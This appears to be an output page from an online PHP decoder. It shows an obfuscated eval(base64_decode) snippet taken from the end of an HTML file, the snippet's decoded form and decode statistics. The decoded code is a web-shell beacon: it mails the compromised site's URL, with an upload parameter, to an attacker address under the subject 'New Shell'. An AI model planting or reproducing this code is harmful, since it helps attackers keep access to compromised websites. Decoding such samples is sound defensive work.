Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

eval(base64_decode('JHRvID0gImRyYnhzQHlhaG9vLmNvbSI7DQokc3ViamVjdCA9ICJOZXcgU2hlbGwiOw..

Decoded Output download

$to = "[email protected]";
$subject = "New Shell";
$header = "From: xTalGhim<[email protected]>";
$message = "Exploit : http://". $_SERVER['SERVER_NAME']. $_SERVER['REQUEST_URI'] . "?upload=up 
";
$sentmail = @mail($to, $subject, $message, $header);
echo "";
exit;

Did this file decode correctly?

Original Code

    eval(base64_decode('JHRvID0gImRyYnhzQHlhaG9vLmNvbSI7DQokc3ViamVjdCA9ICJOZXcgU2hlbGwiOw0KJGhlYWRlciA9ICJGcm9tOiB4VGFsR2hpbTxzZXJ2aWNlQGFjY291bnQuY29tPiI7DQokbWVzc2FnZSA9ICJFeHBsb2l0IDogaHR0cDovLyIuICRfU0VSVkVSWydTRVJWRVJfTkFNRSddLiAkX1NFUlZFUlsnUkVRVUVTVF9VUkknXSAuICI/dXBsb2FkPXVwIFxyXG4iOw0KJHNlbnRtYWlsID0gQG1haWwoJHRvLCAkc3ViamVjdCwgJG1lc3NhZ2UsICRoZWFkZXIpOw0KZWNobyAiIjsNCmV4aXQ7')); 
    ?> 
    <p align="center">&nbsp;</p> 
&nbsp; 
    </body> 
</html>

Function Calls

base64_decode 1

Variables

None

Stats

MD5 acd35387b7a70f501698e0aa1e306377
Eval Count 1
Decode Time 123 ms